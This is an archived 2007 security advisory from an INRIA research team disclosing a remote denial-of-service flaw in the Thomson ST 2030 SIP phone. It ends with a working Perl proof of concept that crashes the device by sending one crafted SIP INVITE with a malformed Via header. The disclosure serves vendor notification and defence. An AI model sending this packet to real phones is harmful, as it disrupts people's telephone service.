thomsonsip-dos.txt

2007-08-24T00:00:00
ID PACKETSTORM:58801
Type packetstorm
Reporter Radu State
Modified 2007-08-24T00:00:00

Description

                                        
                                            `   
  
MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030  
  
  
  
Date of Discovery 15 February, 2007  
  
  
  
Vendor was notified on 1 March 2007  
  
  
  
ID: KIPH8  
  
  
  
Synopsis  
  
  
  
After sending a message where the a space is replaced by a slash after the  
SIP version in the VIA, the device looks functional but in fact does not  
respond to any event provoking a DoS.   
  
  
  
  
  
Background   
  
  
  
SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP  
signalization. SIP is an ASCII based INVITE message is used to initiate and  
maintain a communication session.   
  
  
  
  
  
Affected devices: Thomson SIP phone ST 2030  
  
  
  
Impact :  
  
A malicious user can remotely crash and perform a denial of service attack  
by sending one crafted SIP message.   
  
  
  
Resolution  
  
Fixed software will be available from the vendor and customers following  
recommended best practices (ie segregating VOIP traffic from data) will be  
protected from malicious traffic in most situations.   
  
  
  
Credits  
  
  
  
Humberto J. Abdelnur (Ph.D Student)   
  
Radu State (Ph.D)   
  
Olivier Festor (Ph.D)   
  
  
  
This vulnerability was identified by the Madynes research team at INRIA  
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see  
http://hal.inria.fr/inria-00166947/en),  
  
  
  
  
  
  
  
Configuration of our device:  
  
  
  
  
  
Software Version: v1.52.1   
  
IP-Address obtained by DHCP as 192.168.1.106   
  
User name : thomson  
  
  
  
  
  
To run the exploit the file thomson-2030-3.pl should be launched (assuming  
our configurations) as:  
  
  
  
perl thomson-2030-3.pl 192.168.1.106 5060 thomson  
  
  
  
  
  
POC Code :  
  
  
  
  
  
!/usr/bin/perl  
  
#Vulnerability for Thomson 2030 firmware v1.52.1  
  
#It provokes a DoS in the device.   
  
  
  
use IO::Socket::INET;  
  
die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);  
  
  
  
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],  
  
Proto=>'udp',  
  
PeerAddr=>$ARGV[0]);  
  
  
  
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia:  
SIP/2.0/UDP\\192.168.1.2;branch=00\r\nFrom: Caripe  
<sip:caripe\@192.168.1.2>;tag=00\r\nTo:  
<sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: caripe\@192.168.1.2\r\nCSeq: 2  
INVITE\r\n\r\n";  
  
$socket->send($msg);  
  
  
  
  
  
  
  
`